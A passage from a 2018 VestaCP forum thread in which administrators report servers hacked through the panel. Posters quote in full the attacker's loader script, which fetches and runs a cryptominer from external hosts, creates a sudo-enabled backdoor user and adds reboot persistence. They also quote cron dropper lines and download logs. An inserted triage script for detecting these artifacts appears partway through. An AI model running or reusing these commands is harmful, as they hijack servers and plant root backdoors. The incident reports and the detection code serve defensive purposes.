We are happy to announce that Vesta is back under active development as of 25 February 2024. We are working on v1 candidate and expect to engage more with the community over the coming months. We are committed to open source, and we encourage contributors to help us build the future of Vesta.
have been HACKED ! by xaxaxa.eu
Re: have been HACKED ! by xaxaxa.eu
Please open another thread for this issue.
aximus wrote: ↑Tue Jun 26, 2018 8:11 am
I did exactly as you wrote.
ScIT wrote: ↑Tue Jun 26, 2018 7:29 am
Did you try to upgrade like I wrote? -> viewtopic.php?f=10&t=17183#p71558
If yes, please share the output of ./v-list-sys-vesta-updates.
I don't mean to hijack the topic. But if I'm not receiving updates then of course my server will be targeted.
Code:
PKG         VER    REL  ARCH   UPDT  DATE
---         ---    ---  ----   ----  ----
vesta       0.9.8  20   amd64  no    2018-04-09
vesta-php   0.9.8  19   amd64  no    2018-01-23
vesta-nginx 0.9.8  20   amd64  no    2018-04-09
Re: have been HACKED ! by xaxaxa.eu
Because I still have not got any information from other users: was your system infected with the patch installed or without? The current patch is 0.9.8-22 and fixes the security issue.
jonny1960 wrote: ↑Tue Jun 26, 2018 8:07 am
I also was hacked tonight by a mining virus:
if pgrep -x "gcc" > /dev/null
then
echo "Running"
else
cd;
pkill -f xmrig;
rm -rf /tmp/gcc;
rm -rf /tmp/config_1.json;
wget -O /tmp/gcc http://bigbatman.loan/gcc;
chmod 777 /tmp/gcc;
wget -O /tmp/config_1.json http://bigbatman.loan/config_1.json;
/tmp/gcc -c /tmp/config_1.json;
echo "fucktheniggers" | sudo -S useradd sysroot;
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
(crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
/usr/local/vesta/bin/v-update-sys-vesta-all;
fi
Re: have been HACKED ! by xaxaxa.eu
As a last reply: I have fixed the issue by adding the right repositories to apt:
Code:
CHOST='c.vestacp.com'
RHOST='apt.vestacp.com'
codename="$(lsb_release -s -c)"
apt=/etc/apt/sources.list.d
echo "deb http://$RHOST/$codename/ $codename vesta" > $apt/vesta.list
wget $CHOST/deb_signing.key -O deb_signing.key
apt-key add deb_signing.key
echo "deb http://nginx.org/packages/mainline/ubuntu/ $codename nginx" > $apt/nginx.list
wget http://nginx.org/keys/nginx_signing.key -O /tmp/nginx_signing.key
apt-key add /tmp/nginx_signing.key
apt-get update && apt-get upgrade -y
Re: have been HACKED ! by xaxaxa.eu
Glad that you found the solution on your own!
aximus wrote: ↑Tue Jun 26, 2018 9:20 am
As a last reply: I have fixed the issue by adding the right repositories to apt:
This is normally done when installing Vesta, but somehow it got lost for my installation.
Code:
CHOST='c.vestacp.com'
RHOST='apt.vestacp.com'
codename="$(lsb_release -s -c)"
apt=/etc/apt/sources.list.d
echo "deb http://$RHOST/$codename/ $codename vesta" > $apt/vesta.list
wget $CHOST/deb_signing.key -O deb_signing.key
apt-key add deb_signing.key
echo "deb http://nginx.org/packages/mainline/ubuntu/ $codename nginx" > $apt/nginx.list
wget http://nginx.org/keys/nginx_signing.key -O /tmp/nginx_signing.key
apt-key add /tmp/nginx_signing.key
apt-get update && apt-get upgrade -y
Re: have been HACKED ! by xaxaxa.eu
The hack happened on version 21; after updating to 22 and removing the virus, the issue stopped.
But now I have a problem with file_get_contents(): it does not work and does not send a request, a zero response comes back too fast. But curl_init() works.
Do you have an idea of what the problem may be?
file_get_contents(): failed to open stream: php_network_getaddresses: getaddrinfo failed: System error
Re: have been HACKED ! by xaxaxa.eu
in Vesta CRON!!!!
wget -O /tmp/load.sh http://bigbatman.loan/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >>
wget -O /tmp/load.sh http://xaxaxa.eu/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >> /tmp/out.log
wget -O /tmp/load.sh http://xaxaxa.eu/load.sh; chmod x /tmp/load.sh; /tmp/load.sh >> /tmp/out.log
You must delete and update.
Re: have been HACKED ! by xaxaxa.eu
Please open your own topic for this issue.
jonny1960 wrote: ↑Tue Jun 26, 2018 9:23 am
The hack happened on version 21; after updating to 22 and removing the virus, the issue stopped.
But now I have a problem with file_get_contents(): it does not work and does not send a request, a zero response comes back too fast. But curl_init() works.
Do you have an idea of what the problem may be?
file_get_contents(): failed to open stream: php_network_getaddresses: getaddrinfo failed: System error
Re: have been HACKED ! by xaxaxa.eu
I don't think that this alone will solve the issue. As already written, the update does NOT remove malware, it fixes the security issue. In my point of view: never trust a hacked server, you don't know what exactly happened and what the hacker (or script) has done with it. The best and safest way would be to reinstall the server and migrate the user content.
Llorca wrote: ↑Tue Jun 26, 2018 10:36 am
in Vesta CRON!!!!
wget -O /tmp/load.sh http://bigbatman.loan/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >>
wget -O /tmp/load.sh http://xaxaxa.eu/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >> /tmp/out.log
wget -O /tmp/load.sh http://xaxaxa.eu/load.sh; chmod x /tmp/load.sh; /tmp/load.sh >> /tmp/out.log
You must delete and update.
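A triage check for the persistence the posts above describe (the @reboot crontab entry, the sysroot account with its sudoers line, and the files dropped in /tmp), written here as an added example rather than code from the thread; the function names and the sample inputs are constructed, and the paths are parameters so the check can run against files copied from a disk image as well as on the live host.

```shell
#!/bin/sh
# Added triage check, not code from the thread: looks for the persistence
# artifacts the posted load.sh leaves behind (the @reboot crontab line,
# the "sysroot" account and its sudoers entry, the files dropped in /tmp).

# check_persistence CRONTAB_DUMP PASSWD_FILE SUDOERS_FILE TMP_DIR
# Prints one line per finding; exit status is the number of findings (0 = clean).
check_persistence() {
    cron=$1; passwd=$2; sudoers=$3; tmp=$4
    hits=0
    # @reboot entry relaunching the miner from /tmp
    if grep -Eq '@reboot[[:space:]]+/tmp/gcc' "$cron" 2>/dev/null; then
        echo "crontab: @reboot launcher for /tmp/gcc"; hits=$((hits + 1))
    fi
    # cron line that fetches a script into /tmp with wget
    if grep -Eq 'wget[^;]*-O[[:space:]]+/tmp/[^ ;]+\.sh' "$cron" 2>/dev/null; then
        echo "crontab: wget dropper writing a script into /tmp"; hits=$((hits + 1))
    fi
    # backdoor account and its sudo grant
    if grep -q '^sysroot:' "$passwd" 2>/dev/null; then
        echo "passwd: sysroot account present"; hits=$((hits + 1))
    fi
    if grep -Eq '^sysroot[[:space:]]+ALL=\(ALL\)' "$sudoers" 2>/dev/null; then
        echo "sudoers: sysroot granted full sudo"; hits=$((hits + 1))
    fi
    # dropped files
    for f in gcc config_1.json load.sh; do
        [ -e "$tmp/$f" ] && { echo "tmp: $tmp/$f exists"; hits=$((hits + 1)); }
    done
    return "$hits"
}

# Constructed sample inputs modelled on the thread (not data from a real host).
make_sample() {
    d=$(mktemp -d)
    printf '@reboot /tmp/gcc -c /tmp/config_1.json\n' > "$d/crontab"
    printf 'root:x:0:0:root:/root:/bin/bash\nsysroot:x:1001:1001::/home/sysroot:/bin/sh\n' > "$d/passwd"
    printf 'root ALL=(ALL) ALL\nsysroot ALL=(ALL) ALL\n' > "$d/sudoers"
    mkdir "$d/tmp"; : > "$d/tmp/gcc"; : > "$d/tmp/config_1.json"
    echo "$d"
}

# Sample run; on a live host: crontab -l > cron.txt, then
# check_persistence cron.txt /etc/passwd /etc/sudoers /tmp
s=$(make_sample); check_persistence "$s/crontab" "$s/passwd" "$s/sudoers" "$s/tmp" || echo "findings: $?"
```

Run it for every account's crontab (not only the one you are logged in as) and against /etc/cron.d as well, since the posts show the dropper line sitting in the Vesta cron rather than root's.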
Re: have been HACKED ! by xaxaxa.eu
Hi,
Tonight a hacker fucked me.
OK, I restored a snapshot from 2 days ago and updated to the latest Vesta.
I closed port 8083 in my firewall; I think it is bad to use the default public Vesta port, but changing the port doesn't solve the VestaCP bug, the hacker uses the login page.
Code:
if pgrep -x "gcc" > /dev/null
then
echo "Running"
else
cd;
pkill -f xmrig;
wget -O /tmp/gcc http://xaxaxa.eu/gcc;
chmod +x gcc;
wget -O /tmp/config_1.json http://xaxaxa.eu/config_1.json;
/tmp/gcc -c /tmp/config_1.json;
echo "fucktheniggers" | sudo -S useradd sysroot;
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
(crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
/usr/local/vesta/bin/v-update-sys-vesta-all;
fi
Code:
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 22 amd64 yes 2018-06-26
vesta-php 0.9.8 21 amd64 yes 2018-05-22
vesta-nginx 0.9.8 21 amd64 yes 2018-05-22
Before the update I used 0.9.8 20.
VestaCP sent me an e-mail:
Code:
--2018-06-26 01:34:01-- http://xaxaxa.eu/load.sh
Resolving xaxaxa.eu (xaxaxa.eu)... 198.251.90.113
Connecting to xaxaxa.eu (xaxaxa.eu)|198.251.90.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 605 [application/x-sh]
Saving to: ‘/tmp/load.sh’
0K 100% 116M=0s
2018-06-26 01:34:02 (116 MB/s) - ‘/tmp/load.sh’ saved [605/605]
chmod: invalid mode: ‘x’
Try 'chmod --help' for more information.
--2018-06-26 01:34:02-- http://xaxaxa.eu/gcc
Resolving xaxaxa.eu (xaxaxa.eu)... 198.251.90.113
Connecting to xaxaxa.eu (xaxaxa.eu)|198.251.90.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1256576 (1.2M) [text/plain]
Saving to: ‘/tmp/gcc’
2018-06-26 01:34:07 (272 KB/s) - ‘/tmp/gcc’ saved [1256576/1256576]
chmod: cannot access ‘gcc’: No such file or directory
--2018-06-26 01:34:07-- http://xaxaxa.eu/config_1.json
Resolving xaxaxa.eu (xaxaxa.eu)... 198.251.90.113
Connecting to xaxaxa.eu (xaxaxa.eu)|198.251.90.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 681 [application/json]
Saving to: ‘/tmp/config_1.json’
0K 100% 49.5M=0s
2018-06-26 01:34:07 (49.5 MB/s) - ‘/tmp/config_1.json’ saved [681/681]
[sudo] password for admin: useradd: user 'sysroot' already exists
/tmp/load.sh: line 13: /tmp/gcc: Permission denied
/tmp/load.sh: line 15: /usr/local/vesta/bin/v-update-sys-vesta-all: Permission denied
Code:
--2018-06-26 01:34:01-- http://xaxaxa.eu/load.sh
Resolving xaxaxa.eu (xaxaxa.eu)... 198.251.90.113
Connecting to xaxaxa.eu (xaxaxa.eu)|198.251.90.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 605 [application/x-sh]
Saving to: ‘/tmp/load.sh’
0K 100% 48.2M=0s
2018-06-26 01:34:02 (48.2 MB/s) - ‘/tmp/load.sh’ saved [605/605]
/bin/sh: /tmp/load.sh: Text file busy
Re: have been HACKED ! by xaxaxa.eu
I have posted a quick and dirty tutorial to remove what I have found: viewtopic.php?p=71564#p71564
In my case, and for the time needed to move the hosted websites to a new server, it solved the issue.